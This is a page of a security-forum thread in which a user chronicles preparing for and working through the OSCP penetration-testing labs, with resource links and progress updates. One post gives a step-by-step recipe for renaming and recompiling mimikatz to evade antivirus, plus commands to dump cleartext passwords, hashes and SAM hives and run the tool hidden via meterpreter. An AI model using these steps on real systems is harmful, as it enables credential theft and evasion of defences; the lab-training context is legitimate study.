+ Reply to Thread
Page 2 of 5 First 12 345 Last
Results 26 to 50 of 120
  1. California Kid JoJoCal19's Avatar
    Join Date
    Mar 2009
    Location
    Jacksonville, FL
    Posts
    2,324

    Certifications
    CISSP, CISM, CISA, CRISC, GCIA, GSEC, CEHv8, CHFIv8, ITIL-F, MSISA, BSBA
    #26
    This thread is great! Thanks for all of the info JollyFrogs. Also like the_Grinch, I'd like to know what your background is. Also if it wouldn't be too much trouble, can you list the sources, links, book names, you used to to learn these pre-sign up skills? It would be beneficial to myself and others looking at the OSCP.
    Have: CISSP, CISM, CISA, CRISC, GCIA, GSEC, CEHv8, CHFIv8, ITIL-F, BSBA - University of Florida, MSISA - WGU
    Currently Working On: MS Cybersecurity, Learning Python
    Next Up:​ None
    Reading:​ Python Crash Course
    Reply With Quote Quote  

  2. SS -->
  3. Member
    Join Date
    May 2015
    Posts
    79
    #27
    Quote Originally Posted by the_Grinch View Post
    Awesome posts! Let me just commend you on all the work you have done prior to signing up. What's your background?
    Quote Originally Posted by JoJoCal19 View Post
    This thread is great! Thanks for all of the info JollyFrogs. Also like the_Grinch, I'd like to know what your background is. Also if it wouldn't be too much trouble, can you list the sources, links, book names, you used to to learn these pre-sign up skills? It would be beneficial to myself and others looking at the OSCP.
    Hi The_Grinch and JoJoCal19, I started using computers when I was 7 when my dad bought a Commodore 64 for the family. Although a family gift, none of my family members were interested in computers so I had plenty of time to get acquainted with BASIC and of course play the many games that I was trading with friends. There was no internet back in the days and most programs would be loaded from music cassettes (magnetic tape is still used today to store information for instance in DLT tapes). I remember tuning in to radio shows that broadcast code which you could record onto cassette and then load in the computer. We're talking WarGames era here where internet connections still made beeping and screeching noises. Of course my parents never allowed me to use the phone line so I was limited to one-way traffic from the public radio stations to my dad's Pioneer radio system.

    The above might make me sound old but I'm only 38 (I guess that statement is relative) and have worked with computers my whole life. When I was 20 I was poached by a large corporation to work on IBM Mainframes. This was in the late 1990's and it was a time of plenty, back then companies would hire anyone to work on computers due to a global shortage of IT staff. I started off in "Tape Setup" department which was a large library of magnetic DLT tapes, and we would be working in shifts 24-hour around the clock, watching 3 screens with "batch job requests", essentially tape ID numbers, and run to the correct tape readers to insert these tapes. I have fond memories of Tape Setup. The Tape Setup also served as a prospective pool of future Mainframe operators, and after a few weeks there was an opening as a Mainframe operator in the systems team. I applied and was hired. I worked with mainframes in shifts for around a year and was poached internally by a visionary manager who had just started the "Windows NT department". Our mainframe computer terminals were being replaced by NT workstations at a very fast pace and their department couldn't keep up. I got a job as an NT server administrator. They gave me an MCSE NT 4.0 course and I certified. Shortly after, I was among the first people in the world to certify for Windows 2000 (The only reason I know this is because I received a signed "early achiever" reward from Bill Gates). My manager allowed me to study almost non-stop as long as I kept the servers running. I was responsible for about 70 Windows NT servers, and they all ran like clockwork, so I had plenty of time to study.

    (Shortening the story a bit here) After a few years in the Windows server department, I realized that my days as a server administrator would soon be coming to an end as more and more of our systems support was being outsourced to India. As Darwin once said, "It is not the strongest species that survives, but the most adaptable". So I got Cisco certifications and applied for a job in networks support, which I did for a few years. When networking started to get off-shored and outsourced, and with the rise of "the cloud" which virtualizes most of the networking equipment I was supporting, I got into security. Security came naturally to me as most of my setups would take it into account, and having a broad basis of systems knowledge and networks really helped ease the learning curve. I got CISSP certified, did some contracting and freelancing and have settled in an information security job in Brisbane for about a year now. I'm enjoying security and believe this will be my last career switch, having switched twice within the IT field.

    Over the years I have gotten quite a few certifications, partly thanks to employers who saw the benefit in training their staff but mostly because I self-study at home almost every day - I enjoy it and I crave it. My list of certifications includes CCNP, CCDP, CCVP, MCSE, MCDBA, CISSP (the list is quite extensive but those would be my preferred ones; the ones I learnt most from or have gotten most value out of during my career). Every 2 years I get another Cisco certification simply to keep my certs active, the Windows certifications don't expire and I need 40 CPE points per year for my CISSP accreditation. Unfortunately the value of these certifications has dropped significantly with the up-rise of brain-dumping sites. And that is why I'm doing OSCP now! It's hands-on. No cheating and no brain-dumping: This is a journey that people take alone. This is the "Camino de la Sabatera" of the IT certifications: I will value this certificate more than any of the ones I have gotten so far (except perhaps my early achievers award from Bill Gates!). I have learnt so much already even before starting the course.

    Overall I would rate my knowledge coming into the OSCP studies as follows:
    Networks = excellent
    Microsoft = excellent
    Linux = moderate
    Coding = moderate
    Scripting = moderate
    Security (theory) = moderate
    Security (practical) = moderate
    Assembly = low
    Python = zero
    Linux Kali = zero
    Metasploit = zero

    I will list the resources I used to get up to speed in a separate reply. I'm on 904 pages of notes so far in KeepNote so I will just get the most important links that I used.

    EDIT: I posted the links, but I guess the sheer volume of URLs resulted in the post being marked for review by a moderator. If it doesn't get approved - which due to the hackish nature of some of the links is completely understandable - then I will post a pastebin link instead.
    Last edited by JollyFrogs; 06-13-2015 at 04:17 AM.
    Reply With Quote Quote  

  4. Member
    Join Date
    May 2015
    Posts
    79
    #28
    As requested, here is a non-exhaustive list of resources I have used so far. Please keep in mind that some of these links have hundreds or thousands of links in them, most of which I would have read. A good resource to start out is the very first link on this website, which has hundreds of interesting links.

    Be warned: This rabbit hole goes deep.

    Interesting reading:
    https://code.google.com/p/pentest-bo.../BookmarksList
    http://resources.infosecinstitute.co...door-python-z/
    https://blog.netspi.com/netspis-top-...ords-for-2014/
    https://github.com/SpiderLabs/Responder
    http://windowssecrets.com/top-story/
    http://resources.infosecinstitute.co...using-ollydbg/
    https://www.corelan.be/index.php/200...t-development/
    http://jbremer.org/mona-101-a-global-samsung-dll/
    http://sgros-students.blogspot.sg/20...cs-part-1.html
    http://sgros-students.blogspot.sg/20...cs-part-2.html
    http://blog.cobaltstrike.com/2014/03...s-should-know/
    http://www.pretentiousname.com/misc/...hitelist2.html
    http://www.pretentiousname.com/misc/...c_details.html
    http://withinwindows.com/2009/02/05/...ated-binaries/
    https://www.exploit-db.com/bypassing...vista7-mirror/
    http://security.stackexchange.com/qu...-for-windows-7
    http://www.primalsecurity.net/0x8-ex...ive-egghunter/
    http://hackerforhire.com.au/
    http://n01g3l.tumblr.com/
    http://veneetbhardwaj.blogspot.sg/
    http://nethekk.blogspot.sg/2014/01/slmail-exploit.html
    https://github.com/samratashok/nishang
    http://j3rge.blogspot.sg/
    https://twitter.com/ithurricanept
    https://github.com/hfiref0x
    http://www.pretentiousname.com/misc/...hitelist2.html
    https://zdresearch.com/internet-expl...rop-genration/
    http://www.justanotherhacker.com/201...web-shell.html
    http://woshub.com/how-to-extract-win...-hiberfil-sys/
    http://rycon.hu/papers/goldenticket.html
    http://www.beneaththewaves.net/Proje...lkthrough.html


    Exploit and vulnerability databases:
    http://www.exploit-db.com
    https://code.google.com/p/google-sec...ry&cells=tiles
    http://packetstormsecurity.com/files/os/7
    https://packetstormsecurity.com/
    http://farlight.org/index.html?type=local


    Restricted shell escape:
    https://blog.netspi.com/breaking-out...ix-and-kiosks/


    Privilege Escalation:
    http://blog.g0tmi1k.com/2011/08/basi...ge-escalation/
    https://blog.netspi.com/windows-priv...or-privileges/
    https://blog.netspi.com/windows-priv...in-privileges/
    http://www.fuzzysecurity.com/tutorials/16.html
    https://www.youtube.com/watch?v=kMG8IsCohHA
    http://www.greyhathacker.net/?p=738
    http://harmj0y.net
    http://www.tarasco.org/


    ROP: ASLR and DEP/NX:
    https://www.trustwave.com/Resources/...X-ASLR-bypass/
    http://security.stackexchange.com/qu...es-aslr-dep-nx
    http://en.wikipedia.org/wiki/Return-...ed_programming
    http://www.mastropaolo.com/2005/06/0...d-bits-part-1/
    https://samsclass.info/127/proj/rop.htm
    http://nicholas.carlini.com/papers/2...ropattacks.pdf
    https://ctf-team.vulnhub.com/picoctf-2014-hardcore-rop/


    Boot to root websites:
    https://exploit-exercises.com/
    http://0daysecurity.com/pentest.html
    http://blog.agupieware.com/2014/10/h...ng-victim.html


    Pentesting blogs:
    https://idzer0.com


    Reconnaissance websites:
    http://whois.domaintools.com/nextdc.com


    Shell codes:
    https://www.exploit-db.com/shellcode/
    http://www.secdev.org/projects/shellforge/
    https://www.corelan.be/index.php/201...2-shellcoding/
    http://www.leidecker.info/downloads/index.shtml#shells
    https://github.com/dotcppfile/Serbot
    http://shell-storm.org/shellcode/
    http://bernardodamele.blogspot.sg/20...ne-liners.html


    Tools to hide Shells:
    https://www.veil-framework.com/


    EggHunters:
    http://www.primalsecurity.net/0x8-ex...ive-egghunter/


    Exploit Development:
    https://github.com/SaltwaterC/sploit-tools
    https://github.com/r41p41/snippets
    https://zdresearch.com/internet-expl...rop-genration/
    https://github.com/byt3bl33d3r/MITMf
    https://www.qualys.com/research/top10/2014/07/


    Password leaks/lists:
    http://www.leakedin.com
    http://securityxploded.com/passwordsecrets.php


    OSCP reviews:
    http://popped.io


    Hash cracking:
    http://forum.insidepro.com/viewforum...72f1dc23055572
    http://www.hashkiller.co.uk
    Reply With Quote Quote  

  5. Member
    Join Date
    Nov 2014
    Posts
    77

    Certifications
    CISSP, GSEC, GCED, GWAPT, GISP
    #29
    JollyFrogs, I have been following your adventures in preparing for the OSCP with great interest and enjoyment. Your posts are always a good read, both informational and amusing. I look forward to following your continued adventures, and have been inspired to start my own journey, now in the early getting ready stage. Good luck in this exciting trip!
    Reply With Quote Quote  

  6. Audentis Fortuna Iuvat veritas_libertas's Avatar
    Join Date
    Feb 2009
    Posts
    5,652

    Certifications
    eCPPT, GPEN, GWAPT, GCIH, CISSP, CCNA (expired), MCTS
    #30
    Great stuff! Keep it coming I'm sure you will pass.
    Currently working on: Resting
    Reply With Quote Quote  

  7. Member
    Join Date
    May 2015
    Posts
    79
    #31
    Bob was a great experience, one thing was bugging me though: When I ran mimikatz "it didn't work". No output, nothing. The command ran then exited without errors. I now know that the desktop must have been full of error dialogs, let's hope Bob wasn't using his computer when I did.

    I had compiled mimikatz from source, and I wondered if that might have broken something. So I fired up a Windows XP SP0 machine and tried the pre-compiled mimikatz version from the inter-webs. Sure thing, the program worked flawlessly. I then ran my compiled version - which I thought should be identical - and when executing mimikatz I got an error screen on the desktop stating a "DecodePointer" function in Kernel32.dll couldn't be found. I did some research on this error and learnt that the DecodePointer function was only added to kernel32.dll after Windows SP2: Mystery solved! I added the DecodePointer function to the solution, built it, fired up mimikatz on my Windows XP SP0 machine it worked.

    A minor inconvenience was that my antivirus would pick up Mimikatz as malware and delete the file. I proceeded to change the mimikatz code very slightly and I've come up with a version that my antivirus doesn't detect (yet) as a virus. I've attached the complete procedure below in case someone wants to compile Mimikatz from source and runs into the same issue:

    ------------------
    Author: JollyFrogs, Brisbane
    NOTE: Disable all virus-scanners before you start downloading, keep them disabled until your files are compiled


    Get the required programs and files:
    ----------------------------------
    Download: https://github.com/gentilkiwi/mimika...ive/master.zip (Free)
    Download: GRMWDK_EN_7600_1.ISO from Microsoft (Free)
    Download: vs2013.4_ce_enu.iso from Microsoft (Free)
    Download: fnr.exe from https://findandreplace.codeplex.com/...ads/get/809617
    Download: http://mulder.googlecode.com/svn/tru...odePointer.lib (you can optionally compile it from source)


    Install Driver Development Toolkit:
    ---------------------------------
    Extract GRMWDK_EN_7600_1.ISO with 7-zip
    Run KitSetup.exe
    - Click Yes to start the installation
    - Tick "Full Development Environment" and leave all other options unticked
    - Click "OK" in the bottom right
    - Install path: C:\WinDDK\7600.16385.1\
    - Click "OK" in the bottom right
    - Tick "I Agree" in the bottom left and click "OK"
    NOTE: The installation commences
    - Click "Finish" in the "Microsoft WDK Install Progress" screen


    Install Visual Studio 2013 Community Edition:
    -------------------------------------------
    Extract vs2013.4_ce_enu.iso with 7-zip
    Run vs_community.exe
    - Click "Continue" if you get a setup warning
    - Install path: C:\Program Files (x86)\Microsoft Visual Studio 12.0\
    - Tick "I agree to the License Terms and Privacy Policy."
    - Untick "Join the Visual Studio Experience Improvement Program"
    - Click "Next"
    - Tick and then untick "Select All" to select nothing
    - Click "INSTALL"
    - Click "Yes" to close the UAC warning screen
    NOTE: the installation commences
    - Click "LAUNCH" after install completes
    - Click "Not now, maybe later." in the Welcome screen
    - Select "General" and Select "Blue" and Click "Start Visual Studio"


    Prevent AV detection on Mimikatz:
    ---------------------------------
    Extract mimikatz-master.zip to C:\jollykatz\ (you should end up with C:\jollykatz\mimikatz-master\mimikatz.sln" and a whole bunch of files/folders)


    run the following in a cmd.exe to rename all files and folders to from "mimi" to "jolly":
    powershell.exe -noprofile -command "1..10 | % {Get-ChildItem c:\jollykatz\ -Filter \"*mimi*\" -Recurse | Rename-Item -NewName {$_.name -replace 'mimi','jolly' }}"
    powershell.exe -noprofile -command "1..10 | % {Get-ChildItem c:\jollykatz\ -Filter \"*kuhl*\" -Recurse | Rename-Item -NewName {$_.name -replace 'kuhl','frog' }}"


    run fnr.exe with following settings:
    Dir: C:\jollykatz\
    Tick "Include sub-directories
    File Mask: *.*
    Find: mimi
    replace: jolly
    Click "replace"
    run fnr.exe with following settings:
    Dir: C:\jollykatz\
    Tick "Include sub-directories
    File Mask: *.*
    Find: kuhl
    replace: frog
    Click "replace"
    run fnr.exe with following settings:
    Dir: C:\jollykatz\
    Tick "Include sub-directories
    File Mask: *.*
    Find: eo.oe.kiwi
    replace: THINC.local
    Click "replace"
    Close fnr.exe


    Copy "EncodePointer.lib" to C:\jollykatz\jollykatz-master\lib\Win32
    Copy "EncodePointer.lib" to C:\jollykatz\jollykatz-master\lib\x64
    NOTE: We're adding "EncodePointer.lib" because WinXP SP0/SP1 would error out with a DecodePointer error caused by compiling with VS2013


    Now we'll build "Jollykatz":
    -------------------------
    - Double-click on "C:\jollykatz\jollykatz-master\jollykatz.sln"
    NOTE: Visual Studio Community Edition opens your project


    - In the "Solution Explorer" window on the right, expand "global files" -> "lib" -> right-click on "Win32" and select "Add" -> "Existing Item"
    - Choose "C:\jollykatz\jollykatz-master\lib\Win32\EncodePointer.lib"
    - In the "Solution Explorer" window on the right, expand "global files" -> "lib" -> right-click on "x64" and select "Add" -> "Existing Item"
    - Choose "C:\jollykatz\jollykatz-master\lib\x64\EncodePointer.lib"


    - In the "Solution Explorer" window on the right, right-click on "jollykatz" (might have to scroll to bottom) and select "Properties"
    - Expand "Configuration Properties" -> "General" -> Set "Use of MFC" to "Use Standard Windows Libraries"
    - Click "Apply" in the bottom
    - Expand "Configuration Properties" -> "C/C++" -> "Code Generation" -> Set "Runtime Library" to "Multi-threaded (/MT)"
    - Click "Apply" in the bottom
    - Expand "Configuration Properties" -> "Linker" -> "Input" -> Add "EncodePointer.lib;" at the start of "Additional Dependencies" (in front of "advapi32.lib")
    - Click "OK" in the bottom


    - In the top menu bar, click "Build" -> "Rebuild Solution"
    NOTE: You should see "Rebuild All: 3 succeeded, 0 failed, 0 up-to-date, 0 skipped"
    NOTE: This means that the 32-bit build succeeded!


    - In the top bar, next to "Release", change "Win32" to "x64"
    - In the top menu bar, click "Build" -> "Rebuild Solution"
    NOTE: You should see "Rebuild All: 3 succeeded, 0 failed, 0 up-to-date, 0 skipped"
    NOTE: This means that the 64-bit build succeeded!


    NOTE: You should now see 5 files in the C:\jollykatz\jollykatz-master\Win32\ directory, of which you will need 3:
    - jollykatz.exe
    - jollylib.dll
    - jollydrv.sys
    NOTE: You should see the same file structure in the C:\jollykatz\jollykatz-master\x64\ directory


    Copy and rename C:\jollykatz\jollykatz-master\Win32\jollykatz.exe to C:\jollykatz\jollykatz32.exe
    Copy and rename C:\jollykatz\jollykatz-master\x64\jollykatz.exe to C:\jollykatz\jollykatz64.exe
    NOTE: Typically, you only need jollykatz.exe, the driver (jollydrv.sys) and library (jollylib.dll) files are optional. If you need the drivers, copy and rename them as well.


    NOTE: Hopefully, your antivirus won't pick up on the new jollykatz.exe files. If it does, you'll need to modify some code. Or use the Veil framework.


    Run Mimikatz from memory through meterpreter (advisable):
    ---------------------------------------------------------
    execute -H -i -c -m -d calc.exe -f jollykatz.exe -a '"privilege::debug" "sekurlsa::logonPasswords full" "exit"'


    How to use:
    ------------


    -- dump clear-text passwords from LSASS process:
    C:\> jollykatz32.exe "privilege::debug" "sekurlsa::logonPasswords full" "exit"


    -- Steal users credentials until they reset their passwords:
    C:\> jollykatz32.exe "privilege::debug" "sekurlsa::ekeys" "exit"


    -- Dump LM and NTLM hashes from SAM:
    C:\> jollykatz32.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit"


    -- read SAM file from /repair or ntbackup files:
    C:\> reg save HKLM\SYSTEM SystemBkup.hiv
    C:\> reg save HKLM\SAM SamBkup.hiv
    (Or use Volume Shadow Copy / BootCD to backup these files or get them from the repair folder
    C:\Windows\System32\config\SYSTEM
    C:\Windows\System32\config\SAM
    C:\> jollykatz32.exe "lsadump::sam SystemBkup.hiv SamBkup.hiv" "exit"
    ------------------
    Reply With Quote Quote  

  8. Senior Member xmalachi's Avatar
    Join Date
    Mar 2010
    Posts
    547

    Certifications
    CISSP, MCITP:EA, Security+, VCA-DCV
    #32
    JollyFrogs, this is easily becoming the most comprehensive OSCP thread on the website. Actually, I'd venture to say that this is the most comprehensive OSCP anything, anywhere. I intend to start my OSCP journey after I complete my degree. I will definitely use this thread as a reference and I look forward to you posting your resources as well as the continued posts as you complete your OSCP. You're an absolute beast already!
    Reply With Quote Quote  

  9. California Kid JoJoCal19's Avatar
    Join Date
    Mar 2009
    Location
    Jacksonville, FL
    Posts
    2,324

    Certifications
    CISSP, CISM, CISA, CRISC, GCIA, GSEC, CEHv8, CHFIv8, ITIL-F, MSISA, BSBA
    #33
    Awesome background Jollyfrogs. I can say that I wish I had the more varied background before getting into security as it would have made some things easier for sure. And thanks for the links! I'll definitely have to do a deep dive before I begin OSCP.
    Last edited by JoJoCal19; 06-16-2015 at 06:34 PM.
    Have: CISSP, CISM, CISA, CRISC, GCIA, GSEC, CEHv8, CHFIv8, ITIL-F, BSBA - University of Florida, MSISA - WGU
    Currently Working On: MS Cybersecurity, Learning Python
    Next Up:​ None
    Reading:​ Python Crash Course
    Reply With Quote Quote  

  10. Junior Member Registered Member
    Join Date
    Jun 2015
    Location
    BR
    Posts
    3

    Certifications
    CEH
    #34
    Great thread! I am planning to attempt OSCP soon, right after the eCPPT! All information here will be very useful for me and I intend to do the same and the time come!
    Reply With Quote Quote  

  11. Member
    Join Date
    May 2015
    Posts
    79
    #35
    My lab access starts upcoming Sunday at 10:00 AM Brisbane time, in two days! I feel excited like I was as a kid a few nights before Christmas. The sneak peak during the VPN test confirmed my methodology works for at least one host, and this has provided me with confidence to build on my initial methodology.

    Over the last few days I've mostly been working on windows scripts targeting looting and privilege escalation. I haven't put any preparation time in Linux, databases or web applications, so I'll have to get up to speed during lab time. It is my intention to share the scripts I create during my OSCP lab adventures once I confirm they work in the labs.

    "How do I ensure that I don't spoil any of the fun for other OSCP students while still sharing my experience in a meaningful and interesting way?". This is a question that I haven't been able to answer yet, but as I move forward into the labs, I am sure I'll find a good balance between providing useful information and spoiling.
    Reply With Quote Quote  

  12. Senior Member fullcrowmoon's Avatar
    Join Date
    Feb 2014
    Location
    NoVA
    Posts
    169

    Certifications
    MSM-Proj.Mgmt., MSM-Info.Sys.Sec., ITIL Foun., ITIL SOA, CISSP, CISM
    #36
    This is really a great write-up, JollyFrogs! Thank you taking the time to keep it up!
    Reply With Quote Quote  

  13. Member
    Join Date
    May 2015
    Posts
    79
    #37
    Just a quick write up that I've started, the email was received at exactly 10:00 AM this morning, so it must be an automatically scheduled tool that sends the email, no complaints here I was happy to see the email. Username and password to connect via OpenVPN are the same as during the connection test, so if people don't get the email at the right time (due to spam filters, or not being able to access their email account for some reason) then they can probably just login with the same details they used to test the connection. IP hasn't changed either, I still have the same dynamic IP I got when I tested, so that saves me time recompiling some of my scripts.

    I took down Alice today. And I reset Bob and had another go at him since I forgot to get the "proof.txt" files. I took down Bob2 as well but that's not really saying much as they are copies. ( there are copies of "popular" machines so you can use either the main one of the secondary, very nice of offset). The proof.txt key is different though, so since I was going for 100% of the labs, I'll need to get all the machines AND their secondaries.

    Resetting hosts is a matter of 10 seconds and the image has been reset. This is needed for computers that rely on "risky" exploits like... well when I crashed Alice. You get 8 resets per day, so use them at will.

    Total hosts down so far: 3
    Reply With Quote Quote  

  14. Member
    Join Date
    May 2015
    Posts
    79
    #38
    What a rush, I just rooted my first Linux machine! I got stuck on a very difficult one, and while running some time-intensive scans on it, I decided to scan another host, BOOM rooted it, and my other scan isn't even completed yet! Granted it was an easy exploit but it still feels good!

    Total hosts rooted so far: 6
    Reply With Quote Quote  

  15. Senior Member MrAgent's Avatar
    Join Date
    Oct 2010
    Location
    Northern Virginia
    Posts
    1,283

    Certifications
    Sec+, MCP, MCSA 2003, MCTS, MCITP:VA, VCP5, MCSA 2012, MCSE Private Cloud, MCSE Server Infrastructure, C|EHv7, RHCSA, OSCP, GCIH, OSWP
    #39
    Keep at it! I'd like to see how you do against sufference
    2016 Goals: GCIH, OSWP - DONE!
    My OSCP review http://www.jasonbernier.com/oscp-review/
    Reply With Quote Quote  

  16. Junior Member Registered Member
    Join Date
    Jun 2015
    Location
    The Flying Dutchman
    Posts
    1

    Certifications
    Sailing, Digging Holes, Treasure Finding
    #40
    Ahoy there Jolly Frog me matey!!

    I be truly enjoyin' ye fine journey over to th' OSCP land 'o plenty. Ye be a motivin' me to sign up 'n join ye on th' cruise. I likes cruises. Much respect, Davey Jones
    Reply With Quote Quote  

  17. Member
    Join Date
    May 2015
    Posts
    79
    #41
    Turns out the machine that had me stumped for the last few days was ghost. Ghost is Bobs (much) sneakier brother and it took me a while to figure out the puzzle. I spend approx 2-3 hours after work on the labs. I keep notes of everything I try, and at 20:30 sharp I call it a day. I could go on the whole night of course, but the long term strategy is to not lose sleep over it. After all, this is brain-work and sleep is essential to keep my head in the game.

    After popping around 7 boxes total, I decided to change my tactics. I had gathered about 15 full credentials, 25 userIDs and 20 passwords in total and I needed to learn Hydra, Medusa, NCrack and all the other brute-force goodies in the software. So how did it go? Well... to be honest, not very successful. I did learn a great amount of things though: Don't run brute-force tools over VPN. The VPN totally kills the speed (Hydra will do about 800 tries per minute on a webserver for instance). Instead, it's much better to use the dedicated Windows machine you get in the labs to run a Windows version of Hydra on and let it run in the background while you do other things.

    That said, I have not (yet) been able to find a single password. I know my commands work because if I add a password (that I found via other means) to the list, it finds the password. Brute-forcing is slow, prone to being detected and blocked, locks out accounts permanently with ease, and my main lesson from all this is that it should be used as a method of last resort and not an easy win as I hoped it would be. Strangely, brute-forcing is not nearly as rewarding as to crack a puzzle with brain power. Not to say it can't be effective, but I won't be relying on it as much as I had initially planned to.

    And now, a bit of fun: "JollyFrogs' Pwn Difficulty Rating":
    1 = Obvious misconfiguration that leads to compromise without skill or scripting (empty pass/post-its with passwords)
    2 = All above + Use of precompiled public exploits without modification or compilation (ie: Script kiddies, Metasploit module)
    3 = All above + Use of modified exploits which lead to root access (msfvenom)
    4 = All above + Use of fuzzing and password/hash cracking which lead to root access
    5 = All above + exploits only lead to low privileged account and requires root privilege escalation
    6 = All above + protection evasion (AV/IPS/ASLR/DEP), write or disassemble simple code
    7 = All above + chaining advanced exploits, network pivoting, vlan hopping, arp poisoning, or MITM
    8 = All above + disassembly, debugging and reverse engineering complex and/or protected code
    9 = All above + Requires creation of new 0day exploit, a new hacking or cracking methodology and expert knowledge in the targetted application
    10 = Hack the Matrix

    Jollyfrogs 1 - Ghost 0
    Total hosts down so far: 9
    Last edited by JollyFrogs; 06-25-2015 at 08:03 AM.
    Reply With Quote Quote  

  18. Achieve excellence daily
    Join Date
    May 2012
    Location
    Washington State
    Posts
    1,342

    Certifications
    CISSP
    #42
    Thanks for posting this. Please keep us updated.
    When you go the extra mile, there's no traffic.
    Reply With Quote Quote  

  19. Member
    Join Date
    May 2015
    Posts
    79
    #43
    Had to do overtime yesterday on an important project so didn't get to do any puzzling. I've got the whole day today to puzzle, and I'm going to spend the next few hours with Phoenix. I'm learning lots, mostly from google at this point as I'm stuck on the system while trying to escalate privileges. I know "the trick" to escalate, but stringing all the bits and pieces together is proving very time consuming indeed.

    Every time I'm getting closer, I realize that the goal was much further away than I originally though. The word "mirage" would have been an appropriate word for the experience I'm going through now. I now realize that what I thought was the hard part (getting a limited shell) now seems to have been the easy part. All good fun though, I'm thoroughly enjoying finding the key and will let you know when I found it

    Edit:
    Thanks Phoenix, you taught me a few valuable lessons!
    Jollyfrogs 1 - Phoenix 0

    Total hosts down: 12
    Last edited by JollyFrogs; 06-28-2015 at 09:24 AM.
    Reply With Quote Quote  

  20. Senior Member MrAgent's Avatar
    Join Date
    Oct 2010
    Location
    Northern Virginia
    Posts
    1,283

    Certifications
    Sec+, MCP, MCSA 2003, MCTS, MCITP:VA, VCP5, MCSA 2012, MCSE Private Cloud, MCSE Server Infrastructure, C|EHv7, RHCSA, OSCP, GCIH, OSWP
    #44
    You're doing well! You've popped more boxes in your first week than I did.
    I am sure you will pass when you go to take the exam.
    Keep it up!
    2016 Goals: GCIH, OSWP - DONE!
    My OSCP review http://www.jasonbernier.com/oscp-review/
    Reply With Quote Quote  

  21. Member
    Join Date
    May 2015
    Posts
    79
    #45
    This is my second week of lab access and I'm thoroughly enjoying the labs. So many hosts, so much to do, puzzles everywhere! I've been on a roll lately, having fine-tuned my approach. During the week I don't have much time and if I can put in 2 hours it's a lot. During weekends I spend about 10 hours per day. I find my original methodology still works, it's sound and makes sense. I have refined it somewhat and will post all my experiences in the labs as I'm keeping notes. I've written around 2000 pages of notes so far! I find that making screenshots isn't as handy as just copy/pasting the actual exploit although I believe OffSec wants at least one screenshot per host.

    I've made a "quick admin access" doc where I can quickly RDP to the hosts or SSH to the hosts using admin passwords that I have recovered. I found that I have used the file more than I expected, going back and forth between hosts. For instance, recently I required a MySQL database, so I fired one up on one of the hosts I had root access on. Haven't touched Humble/Sufferance or Pain yet, as I'm still plucking the low hanging fruit.

    24 hosts down
    1 secret network
    Reply With Quote Quote  

  22. Junior Member M0CAMB0's Avatar
    Join Date
    May 2008
    Posts
    14
    #46
    Hey JollyFrogs, just wanted to chime in and say that as a someone who's just registered for the OSCP fresh out of school and minimal experience in pretty much all of the above, the resources you've provided are really invaluable, out of all the google searching I've done, this is hands down the best guide I've ever seen, I hope you continue blogging your journey here!
    Reply With Quote Quote  

  23. Senior Member MrAgent's Avatar
    Join Date
    Oct 2010
    Location
    Northern Virginia
    Posts
    1,283

    Certifications
    Sec+, MCP, MCSA 2003, MCTS, MCITP:VA, VCP5, MCSA 2012, MCSE Private Cloud, MCSE Server Infrastructure, C|EHv7, RHCSA, OSCP, GCIH, OSWP
    #47
    Still on track JollyFrogs?
    2016 Goals: GCIH, OSWP - DONE!
    My OSCP review http://www.jasonbernier.com/oscp-review/
    Reply With Quote Quote  

  24. Member
    Join Date
    Jul 2015
    Posts
    63

    Certifications
    CEH, ECSA, eCPPT
    #48
    HI Jollyfrogs,
    looking fwd for your update if you have time at your convenience....By the way after reading thru your post, thought of starting my thread and now planning to start OSCP journey......lets see
    Reply With Quote Quote  

  25. Member
    Join Date
    May 2015
    Posts
    79
    #49
    Well, it's the third week in my labs.. and these boxes are definitely getting harder. Currently stuck on Bethany, she's proving to be a real tease!

    Status:
    Total hosts down: 28
    Networks unlocked: 2
    Reply With Quote Quote  

  26. Member
    Join Date
    Jul 2015
    Posts
    63

    Certifications
    CEH, ECSA, eCPPT
    #50
    Quote Originally Posted by JollyFrogs View Post
    Well, it's the third week in my labs.. and these boxes are definitely getting harder. Currently stuck on Bethany, she's proving to be a real tease!

    Status:
    Total hosts down: 28
    Networks unlocked: 2
    Jollyfrog, amazing to see the total hosts down to 28.....Sounds encouraging....Keep up good work.....as you aimed, you will take all machine....good luck........
    Reply With Quote Quote  

+ Reply to Thread
Page 2 of 5 First 12 345 Last

Social Networking & Bookmarks